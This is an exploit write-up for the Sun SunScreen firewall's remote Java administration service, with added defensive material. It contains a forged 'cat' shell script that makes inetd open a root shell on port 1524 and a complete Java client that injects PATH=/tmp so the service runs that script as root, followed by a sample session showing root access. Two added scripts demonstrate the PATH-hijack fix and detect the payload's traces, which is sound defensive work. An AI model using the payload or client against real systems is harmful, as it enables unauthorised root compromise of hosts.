SunScreen is a firewall product from Sun. It runs on port 3858 of a SunOS host and can be administered remotely through a Java service. That Java service contains a number of buffer overflows (at least two), and an attacker who can upload a file to the system can additionally execute arbitrary code. With the helper shell script below uploaded to the remote server, the exploit runs it as root.
/*

Sun Microsystems SunScreen Firewall Root Exploit
discovered & exploited by Kingcope
January 2011

The SunScreen Firewall can be administered remotely via a java protocol service
which is running on port 3858 on a SunOS machine.

This Java Service contains numerous buffer overruns (2 of which I am aware of).
Furthermore it is possible to execute arbitrary code if an attacker manages
to upload a file onto the target system.

As you can see in the following java exploit code the environment
is not properly sanitized prior to executing shell scripts as root,
thus one can use the LD technique to preload binaries or even easier
modify the PATH variable to forge the 'cat' binary (which is executed by lib/screenname)
to be executed in a different place.

This can be exploited locally - remotely especially if anonymous ftp uploads
are possible or any other file transfer protocol is activated. Uploading
a file via the line printer daemon might also be possible.

This has been tested on a SunOS 5.9.

The shell script to be forged as the 'cat' binary..

#!/bin/sh
echo "ingreslock stream tcp nowait root /bin/sh sh -i">/tmp/x;
/usr/sbin/inetd -s /tmp/x; /bin/rm -f /tmp/x
echo "+++ WE OWNED YA+++ WE OWNED YA+++ WE OWNED YA+++ WE OWNED YA+++ WE OWNED YA+++"
#---

upload above shell script to /PATH/cat
chmod a+x /PATH/cat
supply target and PATH envvar to exploit

Opens a root shell on port 1524/tcp (ingreslock)
A successful exploit looks like

$ java SimpleClient

? ??ð? &Connection accepted, no authentication¶? O
+++ WE OWNED YA+++ WE OWNED YA+++ WE OWNED YA+++ WE OWNED YA+++ WE OWNED Y
A+++

$ telnet 192.168.2.3 1524
Trying 192.168.2.3...
Connected to 192.168.2.3.
Escape character is '^]'.
# /bin/uname -a;
SunOS unknown 5.9 Generic_118558-34 sun4u sparc SUNW,Ultra-5_10
^M: not found
# /b
in/id;
uid=0(root) gid=1(other)
^M: not found
#

*/
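The header above says lib/screenname runs `cat` by name as root in whatever environment the client supplies, which is why sending PATH=/tmp redirects it to the forged script. The script below is an added example, not part of Kingcope's exploit or of SunScreen itself: it reproduces that lookup behaviour in a scratch directory with a stand-in "privileged" script and shows the fix a reviewer would ask for (reset PATH, drop the loader variables the header mentions, invoke the binary by absolute path). The function names vulnerable_reader, hardened_reader, setup_scratch and run_with_hijacked_path are my own; it needs only a POSIX sh, mktemp, /bin/cat and /usr/bin/id.

```shell
#!/bin/sh
# Added example (not from the SunScreen exploit above): why an unsanitized
# environment lets a caller hijack an unqualified `cat`, and how to fix it.
# Runs entirely in a scratch directory; no root and no inetd involved.

# Stand-in for a script such as lib/screenname that runs `cat` by name and
# inherits whatever PATH (and LD_*) the caller supplied.
vulnerable_reader() {
    cat "$1"
}

# Hardened stand-in: a privileged script must not trust inherited lookup
# variables. Reset PATH to a fixed trusted value, drop the dynamic-loader
# variables, and call the binary by absolute path so PATH is never
# consulted for it.
hardened_reader() {
    PATH=/usr/bin:/bin
    export PATH
    unset LD_PRELOAD LD_LIBRARY_PATH
    /bin/cat "$1"
}

# Create a scratch directory holding a forged `cat` and a data file
# (constructed contents). Prints the directory path.
setup_scratch() {
    scratch=$(mktemp -d) || return 1
    printf 'real file contents\n' > "$scratch/data.txt"
    # The forged cat uses absolute paths itself, because it too runs with
    # the hijacked PATH.
    cat > "$scratch/cat" <<'EOF'
#!/bin/sh
echo "FORGED cat ran as uid $(/usr/bin/id -u) with args: $*"
EOF
    chmod a+x "$scratch/cat"
    echo "$scratch"
}

# Invoke a reader with PATH pointing only at the attacker-controlled
# directory (the exploit sends PATH=/tmp) and return its first output line.
run_with_hijacked_path() {
    reader=$1
    dir=$2
    ( PATH="$dir"; export PATH; "$reader" "$dir/data.txt" ) | head -n 1
}

# Demonstration: the vulnerable reader executes the forged cat, the
# hardened one reads the real file.
demo_dir=$(setup_scratch)
echo "vulnerable: $(run_with_hijacked_path vulnerable_reader "$demo_dir")"
echo "hardened:   $(run_with_hijacked_path hardened_reader "$demo_dir")"
rm -rf "$demo_dir"
```

Resetting PATH alone is not enough if the script later calls something by relative name from a directory the caller controls, and clearing LD_PRELOAD only matters for dynamically linked programs started from the script; the absolute path plus a fixed PATH covers both cases shown here.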
import java.net.*;
import java.io.*;
import java.util.*;
import java.text.DateFormat;

public class SimpleClient {

    public static void main(String args[]) {

        String str;

        try {
            // Target address and admin-service port are hard-coded; edit them
            // for the target. Note that the header text names port 3858 while
            // the original code connects to 3853.
            Socket s1 = new Socket("192.168.2.3", 3853);

            InputStream is = s1.getInputStream();
            DataInputStream dis = new DataInputStream(is);

            OutputStream s1out = s1.getOutputStream();
            DataOutputStream dos = new DataOutputStream(s1out);

            // Request header exactly as sent by the original exploit; the
            // meaning of the individual fields is not documented here.
            dos.writeByte(1);
            dos.writeByte(0);
            dos.writeShort(0);
            dos.writeInt(0);
            dos.writeByte(3);
            dos.writeByte(0);
            dos.writeShort(2000);
            dos.writeShort(0);
            dos.writeShort(0);

            dos.writeUTF("0xtest");
            dos.writeByte(3);
            dos.writeByte(1);
            dos.writeByte(1);
            dos.writeByte(1);
            dos.writeInt(3);
            dos.writeInt(0);
            dos.writeInt(0);

            // Environment variable handed to the service. It is applied
            // unsanitized to the shell script run as root, so a caller-
            // controlled PATH makes the unqualified `cat` in lib/screenname
            // resolve to /tmp/cat (the forged script from the header).
            dos.writeUTF("PATH=/tmp");
            // Script the service executes as root.
            dos.writeUTF("lib/screenname");

            // Trailing string from the original exploit (role not documented).
            dos.writeUTF("admin1");

            // Print the two response lines; the forged cat's banner shows up here.
            str = dis.readLine();
            System.out.println(str);

            str = dis.readLine();
            System.out.println(str);

            dis.close();
            dos.close();
            s1.close();
        } catch (ConnectException connExc) {
            System.err.println("Could not connect to the server.");
        } catch (IOException e) {
            // ignored, as in the original
        }
    }
}
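The payload in the header leaves two artefacts a responder can look for on the host: a second inetd started from a configuration file outside /etc (the exploit uses /tmp/x, removed right after launch, but the process keeps running) and a root shell listening on 1524/tcp. The script below is an added example, not part of the exploit or of SunScreen: two awk filters over process and socket listings, with the listings themselves constructed in Solaris `ps -ef` / `netstat -an` layout rather than captured from a real host. The names flag_inetd_alt_config and flag_ingreslock_listener are my own.

```shell
#!/bin/sh
# Added example (not from the exploit above): host-side checks for the
# payload's footprint. SAMPLE_PS and SAMPLE_NETSTAT are constructed samples
# in Solaris ps -ef / netstat -an layout, not captures from a real host.

SAMPLE_PS='     UID   PID  PPID  C    STIME TTY      TIME CMD
    root   104     1  0 10:01:00 ?        0:00 /usr/sbin/inetd -s
    root  2211     1  0 10:07:31 ?        0:00 /usr/sbin/inetd -s /tmp/x
    root  2230  2211  0 10:07:40 ?        0:00 sh -i'

SAMPLE_NETSTAT='      *.22                 *.*                0      0 49152      0 LISTEN
      *.3858               *.*                0      0 49152      0 LISTEN
      *.1524               *.*                0      0 49152      0 LISTEN
192.168.2.3.1524     192.168.2.9.40512  65535      0 49640      0 ESTABLISHED'

# Print every inetd command line whose configuration-file argument (any
# non-option argument after the inetd binary) lives outside /etc/.
# The system instance, started without a file argument, is not reported.
flag_inetd_alt_config() {
    awk '
        /inetd/ {
            for (i = 1; i <= NF; i++) {
                if ($i ~ /inetd$/) {
                    for (j = i + 1; j <= NF; j++)
                        if (substr($j, 1, 1) != "-" && index($j, "/etc/") != 1) {
                            print
                            next
                        }
                }
            }
        }'
}

# Print listening sockets bound to port 1524, the port the payload's
# "ingreslock" inetd entry opens. Established connections to it are a
# separate, stronger signal and are left to the analyst here.
flag_ingreslock_listener() {
    awk '$1 ~ /\.1524$/ && $NF == "LISTEN" { print }'
}

printf '%s\n' "$SAMPLE_PS" | flag_inetd_alt_config
printf '%s\n' "$SAMPLE_NETSTAT" | flag_ingreslock_listener
```

On a live Solaris 9 host the same filters run over the real `ps -ef` and `netstat -an` output; a machine that legitimately runs Ingres on 1524 needs that listener whitelisted, and the config-file check should be paired with a look for the `sh -i` child of the suspect inetd.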